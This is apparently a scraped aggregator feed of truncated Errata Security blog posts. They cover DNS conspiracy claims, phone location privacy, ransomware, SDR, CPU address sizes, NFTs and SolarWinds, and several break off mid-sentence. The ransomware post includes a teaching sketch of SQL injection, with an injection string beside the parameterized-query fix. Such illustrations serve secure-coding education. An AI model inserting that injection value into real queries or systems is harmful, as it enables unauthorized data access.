7.5.2.1.3 Credential Management
Like the other sections, this claim is out of place]]> 2021-09-24T03:51:21+00:00 https://blog.erratasec.com/2021/09/check-that-republican-audit-of-maricopa.html www.secnews.physaphae.fr/article.php?IdArticle=3421939 False Threat,Patching None None Errata Security - Errata Security That Alfa-Trump Sussman indictment story about how DNS packets showed secret communications between Alfa Bank in Russia and the Trump Organization, proving a link that Trump denied. I was the only prominent tech expert that debunked this as just a conspiracy-theory[*][*][*]. Last week, I was vindicated by the indictment of a lawyer involved, a Michael Sussman. It tells a story of where this data came from, and some problems with it. But we should first avoid reading too much into this indictment. It cherry-picks data supporting its argument while excluding anything that disagrees with it. We see chat messages expressing doubt in the DNS data. If chat messages existed expressing confidence in the data, we wouldn't see them in the indictment. In addition, the indictment tries to make strong ties to the Hillary campaign and the Steele Dossier, but ultimately, it's weak.
It looks to me like an outsider trying to ingratiate themselves with the Hillary campaign rather than their being part of a grand Clinton-led conspiracy against Trump. With these caveats, we do see some important things about where the data came from. We see how Tech-Executive-1 used his position at cyber-security companies to search private data (namely, private DNS logs) for anything that might link Trump to somebody nefarious, including Russian banks. In other words, a link between Trump and Alfa bank wasn't something they accidentally found; it was one of the many thousands of links they looked for. Such a technique has long been known as a problem in science. If you cast the net wide enough, you are sure to find things that would otherwise be statistically unlikely. In other words, if you do hundreds of tests of hydroxychloroquine or ivermectin on Covid-19, you are sure to find results that are so statistically unlikely that they wouldn't happen more than 1% of the time. If you search worldwide DNS logs, you are certain to find weird anomalies that you can't explain. Unexplained computer anomalies happen all the time, as every user of computers can tell you. We've seen from the start that the data was highly manipulated. It's likely that the data is real, that the DNS requests actually happened, but at the same time, it's been stripped of everything that might cast doubt on the data. In this indictment we see why: even before the data was found, the purpose was to smear Trump. The finders of the data don't want people to come to the best explanation; they want only explanations that hurt Trump. Trump had no control over the domain in question, trump-email.com. Instead, it was created by a hotel marketing firm they hired, Cendyne. It's Cendyne who put Trump's name in the domain.
A broader collection of DNS information including Cendyne's other clients would show whether this was normal or not. In other words, a possible explanation of the data, the hints of a Trump-Alfa connection, has always been the dishonesty of those who collected the data. The above indictment confirms they were at this level of dishonesty. It doesn't mean the DNS requests didn't happen, but that their anomalous nature can be created by deletion of explanatory data. Lastly, we see in this indictment the problem with "experts".]]> 2021-09-21T18:01:25+00:00 https://blog.erratasec.com/2021/09/that-alfa-trump-sussman-indictment.html www.secnews.physaphae.fr/article.php?IdArticle=3408689 False Guideline None None Errata Security - Errata Security How not to get caught in law-enforcement geofence requests September 15, 2021 (FWIW, I'm seeking info from people who actually know the answer based on their expertise, not from those who are just guessing, or are who are now googling around to figure out what the answer may be,)- Orin Kerr (@OrinKerr) September 15, 2021 First, let me address the second part of his tweet, whether I'm technically qualified to answer this. I'm not sure; I have only 80% confidence that I am. Hence, I'm writing this answer as a blogpost hoping people will correct me if I'm wrong. There is a simple answer and it's this: just disable "Location" tracking in the settings on the phone. Both iPhone and Android have a one-click button to tap that disables everything. The trick is knowing which thing to disable. On the iPhone it's called "Location Services". On the Android, it's simply called "Location". If you do start googling around for answers, you'll find articles upset that Google is still tracking them. That's because they disabled "Location History" and not "Location". This left "Location Services" and "Web and App Activity" still tracking them.
Disabling "Location" on the phone disables all these things [*]. It's that simple: one click and done, and Google won't be able to report your location in a geofence request. I'm pretty confident in this answer, despite what your googling around will tell you about Google's pernicious ways. But I'm only 80% confident in my answer. Technology is complex and constantly changing. Note that the answer is very different for mobile phone companies, like AT&T or T-Mobile. They have their own ways of knowing about your phone's location independent of whatever Google or Apple do on the phone itself. Because of modern 4G/LTE, cell towers must estimate both your direction and distance from the tower. I've confirmed that they can know your location to within 50 feet. There are limitations to this; it depends upon whether you are simply in range of the tower or have an active phone call in progress. Thus, I think law enforcement prefers asking Google. Another example is how my car uses Google Maps all the time, and doesn't have privacy settings. I don't know what it reports to Google. So when I rob a bank, my phone won't betray me, but my car will.]]> 2021-09-14T23:17:40+00:00 https://blog.erratasec.com/2021/09/how-not-to-get-caught-in-law.html www.secnews.physaphae.fr/article.php?IdArticle=3370426 False None None None Errata Security - Errata Security Of course you can't trust scientists on politics July 26, 2021 First of all, people trust airplanes because of their long track record of safety, not because of any claims made by scientists. Secondly, people distrust "scientists" when politics is involved because of course scientists are human and can get corrupted by their political (or religious) beliefs. And thirdly, the concept of "trusting scientific authority" is wrong, since the bedrock principle of science is distrusting authority.
What defines science is how often prevailing scientific beliefs are challenged. Carl Sagan has many quotes along these lines that eloquently express this: A central lesson of science is that to understand complex issues (or even simple ones), we must try to free our minds of dogma and to guarantee the freedom to publish, to contradict, and to experiment. Arguments from authority are unacceptable. If you are "arguing from authority", like Paul Graham is doing above, then you are fundamentally misunderstanding both the principles of science and its history. We know where this controversy comes from: politics. The above tweet isn't complaining about the $400 billion U.S. market for alternative medicines, a largely non-political example. It's complaining about political issues like vaccines, global warming, and evolution. The reason those on the right-wing resist these things isn't because they are inherently anti-science, it's because the left-wing is. The left has corrupted and politicized these topics. The "Green New Deal" contains very little that is "Green" and much that is "New Deal", for example. The left goes from the fact "carbon dioxide absorbs infrared" to justify "we need to promote labor unions". Take Marjorie Taylor Greene's (MTG) claim that she doesn't believe in the Delta variant because she doesn't believe in evolution. Her argument is laughably stupid, of course, but it starts with the way the left has politicized the term "evolution". The "Delta" variant didn't arise from "evolution"; it arose because of "mutation" and "natural selection". We know the "mutation" bit is true, because we can sequence the complete DNA and detect that changes happen. We know that "selection" happens, because we see some variants overtake others in how fast they spread. Yes, "evolution" is synonymous with mutation plus selection, but it's also a politically loaded term that means a lot of additional things.
The public doesn't understand mutation and natural-selection, because these concepts are not really taught in school. Schools don't teach students to understand these things; they teach students to believe. The focus of science education in school is indoctrinating students into believing in "evolution" rather than teaching the mechanisms of "mutation" and "natural-selection". We see the conflict in things like describing the evolution of the eyeball, which Creationists "reasonably" believe is too complex to have evolved this way. I put "reasonable" in quotes here because it's just the "God of the gaps" argument, which credits God for everything that science can't explain, which isn't very smart. But at the same time, science textbooks go too far, refusing to admit their gaps in knowledge here. The fossil record shows a lot of complexity arising over time through steady change -- it just doesn't show anything about eyeballs. In other words, it's]]> 2021-07-26T20:52:15+00:00 https://blog.erratasec.com/2021/07/of-course-you-cant-trust-scientists-on.html www.secnews.physaphae.fr/article.php?IdArticle=3137990 False None None None Errata Security - Errata Security Risk analysis for DEF CON 2021 First, a note about risk analysis. For many people, "risk" means something to avoid. They work in a binary world, labeling things as either "risky" (to be avoided) or "not risky". But real risk analysis is about shades of gray, trying to quantify things. The Delta variant is a mutation out of India that, at the moment, is particularly affecting the UK. Cases are nearly up to their pre-vaccination peaks in that country. Note that the UK has already vaccinated nearly 70% of their population -- more than the United States. In both the UK and US there are few preventive measures in place (no lockdowns, no masks) other than vaccines. Thus, the UK graph is somewhat predictive of what will happen in the United States.
If we time things from when the latest wave hit the same levels as peak of the first wave, then it looks like the USA is only about 1.5 months behind the UK.It's another interesting lesson about risk analysis. Most people experience these things as sudden changes. One moment, everything seems fine, and cases are decreasing. The next moment, we are experiencing a major new wave of infections. It's especially jarring when the thing we are tracking is exponential. But we can compare the curves and see that things are totally predictable. In about another 1.5 months, the US will experience a wave that looks similar to the UK wave.Sometimes the problem is that the change is inconceivable. We saw that recently with 1-in-100 year floods in Germany. Weather forecasters predicted 1-in-100 level of floods days in advance, but they still surprised many people.]]> 2021-07-21T18:11:58+00:00 https://blog.erratasec.com/2021/07/risk-analysis-for-def-con-2021.html www.secnews.physaphae.fr/article.php?IdArticle=3108408 False None None None Errata Security - Errata Security Ransomware: Quis custodiet ipsos custodes human-operated ransomware killchain, identify how they typically achieve "administrator" credentials, and fix those problems. In particular, large organizations need to redesign how they handle Windows "domains" and "segment" networks.I read a lot of lazy op-eds on ransomware. Most of them claim that the problem is due to some sort of moral weakness (laziness, stupidity, greed, slovenliness, lust). They suggest things like "taking cybersecurity more seriously" or "do better at basic cyber hygiene". These are "unfalsifiable" -- things that nobody would disagree with, meaning they are things the speaker doesn't really have to defend. 
They don't rest upon technical authority but moral authority: anybody, regardless of technical qualifications, can have an opinion on ransomware as long as they phrase it in such terms. Another flaw of these "unfalsifiable" solutions is that they are not measurable. There's no standard definition for "best practices" or "basic cyber hygiene", so there's no way to tell if you aren't already doing such things, or the gap you need to overcome to reach this standard. Worse, some people point to the "NIST Cybersecurity Framework" as the "basics" -- but that's a framework for all cybersecurity practices. In other words, anything short of doing everything possible is considered a failure to follow the basics. In this post, I try to focus on specifics, while at the same time making sure things are broadly applicable. It's detailed enough that people will disagree with my solutions. The thesis of this blogpost is that we are failing to protect "administrative" accounts. The big ransomware attacks happen because the hackers got administrative control over the network, usually the Windows domain admin. It's with administrative control that they are able to cause such devastation, able to reach all the files in the network, while also being able to delete backups. The Kaseya attacks highlight this particularly well. The company produces a product that is in turn used by "Managed Service Providers" (MSPs) to administer the security of small and medium-sized businesses. Hackers found and exploited a vulnerability in the product, which gave them administrative control of over 1000 small and medium-sized businesses around the world. The underlying problems start with the way their software gives indiscriminate administrative access over computers. Then, this software was written using standard software techniques, meaning with the standard vulnerabilities that most software has (such as "SQL injection").
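To illustrate the class of bug being described -- this is a generic sketch of SQL injection, not Kaseya's actual code -- here is the vulnerable pattern and the parameterized query that avoids it:

```python
import sqlite3

# Generic SQL-injection sketch (hypothetical table, not Kaseya's code).
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (name TEXT, is_admin INTEGER)")
db.execute("INSERT INTO users VALUES ('alice', 0)")

attacker_input = "nobody' OR '1'='1"

# Vulnerable: attacker input is pasted into the query string,
# so the OR clause makes the WHERE match every row.
vulnerable = db.execute(
    f"SELECT name FROM users WHERE name = '{attacker_input}'").fetchall()

# Safe: a parameterized query treats the input as data, not as SQL.
safe = db.execute(
    "SELECT name FROM users WHERE name = ?", (attacker_input,)).fetchall()

print(vulnerable)  # [('alice',)] -- the injection matched everything
print(safe)        # [] -- no user is literally named "nobody' OR '1'='1"
```

The fix is mechanical, which is what makes this a "standard" vulnerability: it shows up wherever query strings are built by concatenation instead of parameter binding.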
It wasn't written in the paranoid, careful way that you'd hope for software that poses this much danger. A good analogy is airplanes. A common joke refers to the "black box" flight-recorders that survive airplane crashes: maybe we should make the entire airplane out of that material. The reason we can't do this is that airplanes would be too heavy to fly. The same is true of software: airplane software is written with extreme paranoia knowing that bugs can l]]> 2021-07-14T20:49:05+00:00 https://blog.erratasec.com/2021/07/ransomware-quis-custodiet-ipsos-custodes.html www.secnews.physaphae.fr/article.php?IdArticle=3067990 False Ransomware,Vulnerability,Guideline None None Errata Security - Errata Security Some quick notes on SDR There are two panes. The top shows the current signal strength as a graph. The bottom pane is the "waterfall" graph showing signal strength over time, displaying strength as colors: black means almost no signal, blue means some, and yellow means a strong signal. The signal strength graph is a bowl shape, because we are actually sampling at a specific frequency of 2.42 GHz, and the further away from this "center", the less accurate the analysis. Thus, the algorithms think there is more signal the further away from the center we are. What we do see here is two peaks, at 2.402 GHz toward the left and 2.426 GHz toward the right (which I've marked with the red line). These are the "Bluetooth beacon" channels. I was able to capture the screen at the moment some packets were sent, showing signal at this point. Below in the waterfall chart, we see packets constantly being sent at these frequencies. We are surrounded by devices giving off packets here: our phones, our watches, "tags" attached to devices, televisions, remote controls, speakers, computers, and so on. This is a picture from my home, showing only my devices and perhaps my neighbors'. In a crowded area, these two bands are saturated with traffic. The 2.4 GHz region also includes WiFi.
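Each row of that waterfall display is essentially a Fourier transform of the sampled signal: power at each frequency bin. A toy illustration, using a naive DFT in pure Python and a made-up two-tone signal standing in for the 2.402/2.426 GHz peaks (the bin numbers here are arbitrary, not real frequencies):

```python
import math

# Toy spectrum analysis: a naive DFT over a synthetic two-tone signal.
# Bins 20 and 60 are arbitrary stand-ins for the two Bluetooth channels.
N = 256
samples = [math.sin(2 * math.pi * 20 * n / N) +
           0.5 * math.sin(2 * math.pi * 60 * n / N)
           for n in range(N)]

def power(bin_k):
    """Signal strength at one frequency bin (one pixel column of the waterfall)."""
    re = sum(s * math.cos(2 * math.pi * bin_k * n / N)
             for n, s in enumerate(samples))
    im = sum(s * math.sin(2 * math.pi * bin_k * n / N)
             for n, s in enumerate(samples))
    return re * re + im * im

spectrum = [power(k) for k in range(N // 2)]
peaks = sorted(range(N // 2), key=spectrum.__getitem__, reverse=True)[:2]
print(sorted(peaks))  # [20, 60] -- the two tones show up as two peaks
```

Real SDR software does the same thing with a fast FFT, thousands of times a second, scrolling each result down the screen as one line of the waterfall.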
So I connected to a WiFi access-point to watch the signal. WiFi uses more bandwidth than Bluetooth. The term "bandwidth" is used today to mean "faster speeds", but it comes from the world of radio where it quite literally means the width of the band. The width of the Bluetooth transmissions seen above is 2 MHz; the width of the WiFi band shown here is 20 MHz. It took about 50 screenshots before getting these two. I had to hit the "capture" button right at the moment things were being transmitted. An easier way is a setting that graphs the current signal strength compared to the maximum recently seen as a separate line. That's shown below: the instant it was taken, there was no signal, but it shows the maximum of recent signals as a separate line:]]> 2021-07-05T17:15:28+00:00 https://blog.erratasec.com/2021/07/some-quick-notes-on-sdr.html www.secnews.physaphae.fr/article.php?IdArticle=3025400 False None None None Errata Security - Errata Security When we'll get a 128-bit CPU The article "You won't live to see a 128-bit CPU" is trending. Sadly, it was non-technical, so it didn't really contain anything useful. I thought I'd write up some technical notes. The issue isn't the CPU, but memory. It's not about the size of computations, but when CPUs will need more than 64 bits to address all the memory future computers will have. It's a simple question of math and Moore's Law. Today, Intel's server CPUs support 48-bit addresses, which is enough to address 256 terabytes of memory -- in theory. In practice, Amazon's AWS cloud servers are offered with up to 24 terabytes, or 45-bit addresses, in the year 2020. Doing the math, it means we have 19 bits or 38 years left before we exceed the 64-bit registers in modern processors. This means that by the year 2058, we'll exceed the current address size and need to move to 128 bits.
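The arithmetic above can be checked directly, assuming memory doubles every two years per Moore's Law (one extra address bit per doubling):

```python
import math

# Check the addressing math: 48 bits covers 256 terabytes, today's
# 24-terabyte servers need ~45 bits, and doubling every 2 years
# exhausts a 64-bit address in the remaining 19 bits.
terabyte = 2 ** 40

tb_addressable_48 = 2 ** 48 // terabyte             # what 48-bit addressing covers
bits_needed = math.ceil(math.log2(24 * terabyte))   # AWS's 24 tb in 2020

bits_left = 64 - bits_needed
years_left = bits_left * 2          # one bit per doubling, 2 years per doubling

print(tb_addressable_48)   # 256 terabytes
print(bits_needed)         # 45 bits
print(2020 + years_left)   # 2058
```

The fragility of the estimate is visible in the code: halve the doubling time, or shave 8 bits off for tags, and the crossover year moves by decades.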
Most people reading this blogpost will be alive to see that, though probably retired. There are lots of reasons to suspect that this event will come both sooner and later. It could come sooner if storage merges with memory. We are moving away from rotating platters of rust toward solid-state storage like flash. There are post-flash technologies like Intel's Optane that promise storage that can be accessed at speeds close to that of memory. We already have machines needing petabytes (at least 50 bits' worth) of storage. Addresses often contain not just the memory address but also some sort of description of the memory. For many applications, 56 bits is the maximum, as they use the remaining 8 bits for tags. Combining those two points, we may be only 12 years away from people starting to argue for 128-bit registers in the CPU. Or, it could come later because few applications need more than 64 bits, other than databases and file-systems. Previous transitions were delayed for this reason, as the x86 history shows. The first Intel CPUs were 16-bit, addressing 20 bits of memory, and the Pentium Pro was 32-bit, addressing 36 bits' worth of memory. The few applications that needed the extra memory could deal with the pain of needing to use multiple numbers for addressing. Databases used Intel's address extensions; almost nobody else did. It took 20 years, from the initial release of the 64-bit MIPS R4000 in 1990 until the average desktop processor Intel shipped in 2010, for mainstream apps to get larger addresses. For the transition beyond 64 bits, it'll likely take even longer, and might never happen. Working with large datasets needing more than 64-bit addresses will be such a specialized discipline that it'll happen behind libraries or operating-systems anyway. So let's look at the internal cost of larger registers, if we expand registers to hold larger addresses. We already have 512-bit CPUs -- with registers that large. My laptop uses one.
It supports AVX-512, a form of "SIMD" that packs multiple small numbers in one big register, so that it can perform identical computations on many numbers at once, in parallel, rather than sequentially. Indeed, even very low-end processors have been 128-bit for a long time -- for "SIMD". In other words, we can have a large register file with wide registers, and handle the bandwidth of shipping those registers around the CPU performing computations on them. Today's processors already handle this for certain types of computations. But just because we can do many 64-bit computations at once ("SIMD") still doesn't mean we can do a 128-bit computation ("scalar"). Simple problems like "carry" get difficult as numbers get larger. Just because SIMD can do multiple small computations doesn't tell us what one large computation will cost. This was why it took an extra decade for Intel to make the transition -- they added 64-bit MMX registers for SIMD a decade before they added 64-bit for normal computations. The abo]]> 2021-06-20T20:34:42+00:00 https://blog.erratasec.com/2021/06/when-well-get-128-bit-cpu.html www.secnews.physaphae.fr/article.php?IdArticle=2957418 False None None None Errata Security - Errata Security Anatomy of how you get pwned This is obviously a trick. But from where? How did it "get on the machine"? There are lots of possible answers. But the most obvious answer (to most people), that your machine is infected with a virus, is likely wrong. Viruses are generally silent, doing evil things in the background. When you see something like this, you aren't infected ... yet. Instead, things popping up with warnings are almost entirely due to evil websites. But that's confusing, since this popup doesn't appear within a web page. It's off to one side of the screen, nowhere near the web browser. Moreover, we spent some time diagnosing this. We restarted the web browser in "troubleshooting mode" with all extensions disabled and went to a clean website like Twitter.
The popup still kept happening. As it turns out, he had another window with Firefox running under a different profile. So while he cleaned out everything in this one profile, he wasn't aware the other one was still running. This happens a lot in investigations. We first rule out the obvious things, and then struggle to find the less obvious explanation -- when it was the obvious thing all along. In this case, the reason the popup wasn't attached to a browser window is because it's a new type of popup notification that's supposed to act more like an app and less like a web page. It has a hidden web page underneath called a "service worker", so the popups keep happening when you think the webpage is closed. Once we figured out the mistake of the other Firefox profile, we quickly tracked this down and saw that indeed, it was in the Notification list with Permissions set to Allow. Simply changing this solved the problem. Note that the above picture of the popup has a little wheel in the lower right. We are taught not to click on dangerous things, so the user in this case was avoiding it. However, had the user clicked on it, it would've led him straight to the solution. Though, I can't recommend you click on such a thing and trust it, because that means in the future, malicious tricks will contain such safe-looking icons that aren't so safe. Anyway, the next question is: which website did this come from? The answer is Google. In the news today was the story of the Michigan guys who tried to kidnap the governor. The user googled "attempted kidnap sentencing guidelines". This search produced a pa]]> 2021-04-29T04:15:50+00:00 https://blog.erratasec.com/2021/04/anatomy-of-how-you-get-pwned.html www.secnews.physaphae.fr/article.php?IdArticle=2713131 False Guideline None None Errata Security - Errata Security Ethics: University of Minnesota's hostile patches their paper is useful.
I would not be able to immediately recognize their patches as adding a vulnerability -- and I'm an expert at such things. In addition, the sorts of bugs it exploits show a way forward in the evolution of programming languages. It's not clear that a "safe" language like Rust would be the answer. Linux kernel programming requires tracking resources in ways that Rust would consider inherently "unsafe". Instead, the C language needs to evolve with better safety features and better static analysis. Specifically, we need to be able to annotate the parameters and return statements from functions. For example, if a pointer can't be NULL, then it needs to be documented as a non-nullable pointer. (Imagine if pointer types, like integers, came in two flavors: ones that can sometimes be NULL and ones that can never be NULL.) So I'm glad this paper exists. As a researcher, I'll likely cite it in the future. As a programmer, I'll be more vigilant in the future. In my own open-source projects, I should probably review some previous pull requests that I've accepted, since many of them have been the same crappy quality of simply adding a (probably) unnecessary NULL-pointer check. The next question is whether this is ethical. Well, the paper claims to have sign-off from their university's IRB -- their Institutional Review Board that reviews the ethics of experiments. Universities created IRBs to deal with the fact that many medical experiments were done on either unwilling or unwitting subjects, such as the Tuskegee Syphilis Study. All medical research must have IRB sign-off these days. However, I think IRB sign-off for computer security research is stupid. Things like masscanning of the entire Internet are undecidable with traditional ethics. I regularly scan every device on the IPv4 Internet, including your own home router. If you paid attention to the packets your firewall drops, some of them would be from me.
Some consider this a gross violation of basic ethics and get very upset that I'm scanning their computer. Others consider this to be the expected consequence of the end-to-end nature of the public Internet, that there's an inherent social contract that you must be prepared to receive any packet from anywhere. Kerckhoffs's Principle from the 1800s suggests that the core ethic of cybersecurity is exposure to such things rather than trying to cover them up. The point isn't to argue whether masscanning is ethical. The point is to argue that it's undecided, and that your IRB isn't going to be able to answer the question better than anybody else. But here's the thing about masscanning: I'm honest and transparent about it. My very first scan of the entire Internet came with a tweet "BTW, this is me scanning the entire Internet". A lot of ethical questions in other fields come down to honesty. If you have to lie about it or cover it up, then th]]> 2021-04-21T17:27:21+00:00 https://blog.erratasec.com/2021/04/ethics-university-of-minnesotas-hostile.html www.secnews.physaphae.fr/article.php?IdArticle=2675984 False Hack,Vulnerability None None Errata Security - Errata Security A quick FAQ about NFTs
0x2a46f2ffd99e19a89476e2f62270e0a35bbf0756 - #40913 (Beeple $69m)
0xb47e3cd837dDF8e4c57F05d70Ab865de6e193BBB - #7804 ($7.6m CryptoPunks)
0x9fc4e38da3a5f7d4950e396732ae10c3f0a54886 - #1 (AP $180k)
0x06012c8cf97BEaD5deAe237070F9587f8E7A266d - #896775 ($170k CryptoKitty)
With these two numbers, you can go find the token on the blockchain, and read the code to determine what the token contains, how it's traded, its current owner, and so on. #2 How do NFTs contain artwork? or, where is artwork contained? Tokens can't*** contain artwork -- art is too big to fit on the blockchain. That Beeple piece is 300 megabytes in size. Therefore, tokens point to artwork that is located somewhere other than the blockchain. *** (footnote) This isn't actually true.
It's just that it's very expensive to put artwork on the blockchain. That Beeple artwork would cost about $5 million to put onto the blockchain. Yes, this is less than a tenth of the purchase price of $69 million, but when you account for all the artwork for which people have created NFTs, the total exceeds the prices for all NFTs. So if artwork isn't on the blockchain, where is it located? And how do the NFTs link to it? Our four example NFTs mentioned above show four different answers to this question. Some are smart, others are stupid -- and by "stupid" I mean "tantamount to fraud". The correct way to link a token with a piece of digital art is through a hash, which can be used with th]]> 2021-03-26T14:51:59+00:00 https://blog.erratasec.com/2021/03/a-quick-faq-about-nfts.html www.secnews.physaphae.fr/article.php?IdArticle=2538944 False None None None Errata Security - Errata Security Deconstructing that $69million NFT
Beeple created a piece of art in a file
He created a hash that uniquely, and unhackably, identified that file
He created a metadata file that included the hash to the artwork
He created a hash to the metadata file
He uploaded both files (metadata and artwork) to the IPFS darknet decentralized file sharing service
He created, or "minted", a token governed by the MakersTokenV2 smart contract on the Ethereum blockchain
Christies created an auction for this token
The auction was concluded with a payment of $69 million worth of Ether cryptocurrency. However, nobody has been able to find this payment on the Ethereum blockchain; the money was probably transferred through some private means.
Beeple transferred the token to the winner, who transferred it again to this final Metakovan account
Each of the links above allows you to drill down to exactly what's happening on the blockchain. The rest of this post discusses things in long form. Why do I care? Well, you don't.
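(As a sketch of the hash-linking steps in the Beeple timeline above: digital art can be fingerprinted with a cryptographic hash, and it is that small digest, not the 300-megabyte file, that ends up referenced by the token's metadata, which is itself hashed. This is illustrative Python, not code from the post; SHA-256 and the metadata field names stand in for whatever a given NFT scheme actually uses.)

```python
import hashlib

def file_digest(path):
    """Hash a (possibly huge) artwork file in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()

# the metadata file embeds the artwork's digest, and is itself hashed,
# so the token -> metadata -> artwork chain is tamper-evident
artwork_hash = hashlib.sha256(b"...imagine 300MB of pixels...").hexdigest()
metadata = f'{{"name": "example-artwork", "artwork_sha256": "{artwork_hash}"}}'
metadata_hash = hashlib.sha256(metadata.encode()).hexdigest()
print(metadata_hash)
```

Changing a single byte of either the artwork or the metadata changes the corresponding digest, which is why a hash (rather than a plain URL) is the "correct way" to link token and art.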
It makes you feel stupid that you haven't heard about it, when everyone is suddenly talking about it as if it's been a thing for a long time. But in reality, they didn't know what it was a month ago, either. Here is the Google Trends graph to prove this point -- interest has only exploded in the last couple months: The same applies to me. I've been aware of them (since the CryptoKitties craze from a couple years ago) but haven't invested time reading source code until now. Much of this blogpost is written as notes as I discover for myself exactly what was purchased fo]]> 2021-03-20T23:52:47+00:00 https://blog.erratasec.com/2021/03/deconstructing-that-69million-nft.html www.secnews.physaphae.fr/article.php?IdArticle=2511961 False Tool,Guideline None None Errata Security - Errata Security We are living in 1984 (ETERNALBLUE) Baltimore ransomware attack. When the attack happened, the entire cybersecurity community agreed that EternalBlue wasn't responsible. But this New York Times article said otherwise, blaming the Baltimore attack on EternalBlue. And there are hundreds of other news articles [eg] that agree, citing the New York Times. There are no news articles that dispute this. In a recent book, the author of that article admits it's not true, that EternalBlue didn't cause the ransomware to spread. But they defend it as being essentially true, that EternalBlue is responsible for a lot of bad things, even if, technically, not in this case. Such errors are justified, on the grounds that they are generalizations and simplifications needed for the mass audience. So we are left with the situation Orwell describes: all records tell the same tale -- when the lie passes into history, it becomes the truth. Orwell continues: He wondered, as he had many times wondered before, whether he himself was a lunatic. Perhaps a lunatic was simply a minority of one.
At one time it had been a sign of madness to believe that the earth goes round the sun; today, to believe that the past is inalterable. He might be ALONE in holding that belief, and if alone, then a lunatic. But the thought of being a lunatic did not greatly trouble him: the horror was that he might also be wrong.
I'm definitely a lunatic, alone in my beliefs. I sure hope I'm not wrong.
Update: Other lunatics document their struggles with Minitrue: When I was investigating the TJX breach, there were NYT articles citing unnamed sources that were made up & then outlets would publish citing the NYT. The TJX lawyers would require us to disprove the articles. Each time we would. It was maddening fighting lies for 8 months.— Nicholas J. Percoco (@c7five) March 1, 2021 ]]>
2021-02-28T20:05:19+00:00 https://blog.erratasec.com/2021/02/we-are-living-in-1984-eternalblue.html www.secnews.physaphae.fr/article.php?IdArticle=2414565 False Ransomware APT 32,NotPetya,Wannacry None
Errata Security - Errata Security Review: Perlroth's book on the cyberarms market I'm not sure what the book intends to be. The blurbs from the publisher imply a work of investigative journalism, in which case it's full of unforgivable factual errors. However, it reads more like a memoir, in which case errors are to be expected/forgivable, with content often from memory rather than rigorously fact-checked notes. But even with this more lenient interpretation, there are important flaws that should be pointed out. For example, the book claims the Saudis hacked Bezos with a zero-day. I claim that's bunk. The book claims zero-days are “God mode” compared to other hacking techniques; I claim they are no better than the alternatives, usually worse, and rarely used.]]> 2021-02-27T00:03:27+00:00 https://blog.erratasec.com/2021/02/review-perlroths-book-on-cyberarms.html www.secnews.physaphae.fr/article.php?IdArticle=2407479 False Ransomware,Guideline None None Errata Security - Errata Security No, 1,000 engineers were not needed for SolarWinds SolarWinds hacker attacks. This means in reality that it was probably fewer than 100 skilled engineers. I base this claim on the following Tweet: When asked why they think it was 1,000 devs, Brad Smith says they saw an elaborate and persistent set of work. Made an estimate of how much work went into each of these attacks, and asked their own engineers. 1,000 was their estimate.— Joseph Cox (@josephfcox) February 23, 2021 Yes, it would take Microsoft 1,000 engineers to replicate the attacks. But it takes a large company like Microsoft 10 times the effort to replicate anything. This is partly because Microsoft is a big, stodgy corporation, but mostly because it's a fundamental property of software engineering: replicating something takes 10 times the effort of creating the original thing. It's like painting. The effort to produce a work is often less than the effort to reproduce it.
I can throw some random paint strokes on canvas with almost no effort. It would take you an immense amount of work to replicate those same strokes -- even to figure out the exact color of paint that I randomly mixed together.
Software Engineering
The process of software engineering is about creating software that meets a certain set of requirements, or a specification. It is an extremely costly process to verify that the software meets the specification. It's as if you build a bridge but forget a piece and the entire bridge collapses. But code slinging by hackers and open-source programmers works differently. They aren't building toward a spec. They are building whatever they can and whatever they want. It takes a tenth, or even a hundredth, of the effort of software engineering. Yes, it usually builds things that few people (other than the original programmer) want to use. But sometimes it produces gems that lots of people use. Take my most popular code slinging effort, masscan. I spent about 6 months of total effort writing it at this point. But if you run code analysis tools on it, they'll tell you that it would take several millions of dollars to replicate the amount of code I've written. And that's just measuring the bulk code, not the numerous clever capabilities and innovations in the code. According to these metrics, I'm either a 100x engineer (a hundred times better than the average engineer) or my claim is true that "code slinging" is a fraction of the effort of "software engineering". The same is true of everything the SolarWinds hackers produced. They didn't have to software engineer code according to Microsoft's processes. They only had to sling code to satisfy their own needs. They don't have to train/hire engineers with the skills necessary to meet a specification; they can write the specification according to what their own engineers can produce.
They can do whatever they want with the code because they don't have to satisfy somebody else's needs.
Hacking
Something is similarly true with hacking. Hacking a specific target, a specific way, is very hard. Hacking any target, any way, is easy. Like most well-known hackers, I regularly get those emails asking me to hack somebody's Facebook account. This is very hard. I can try a lot of things, and in the end, chances are I cannot succeed. On the other hand, if you ask me to hack anybody's Facebook account, I can do that in seconds. I can download one of the many ha]]> 2021-02-25T20:31:46+00:00 https://blog.erratasec.com/2021/02/no-1000-engineers-were-not-needed-for.html www.secnews.physaphae.fr/article.php?IdArticle=2401343 False Hack None None Errata Security - Errata Security The deal with DMCA 1201 reform 2020-12-09T15:25:45+00:00 https://blog.erratasec.com/2020/12/the-deal-with-dmca-1201-reform.html www.secnews.physaphae.fr/article.php?IdArticle=2087760 False Guideline None None Errata Security - Errata Security Why Biden: Principle over Party liberal democracy". Sport matches can be enjoyable even if you don't understand the rules. The same is true of liberal democracy: there's little civic education in the country, so most don't know the rules of the game. Most are unaware even that there are rules. You see that in action with this concern over Trump conceding the election, his unwillingness to commit to a "peaceful transfer of power". His supporters widely believed this is a made-up controversy, a "principle" created on the spot as just another way to criticize Trump. But it's not a new principle. A "peaceful transfer of power" is the #1 bedrock principle from which everything else derives. It's the first way we measure whether a country is actually the "liberal democracy" that it claims to be. For example, the fact that Putin has been in power for 20 years makes us doubt that Russia is really the "liberal democracy" that it claims.
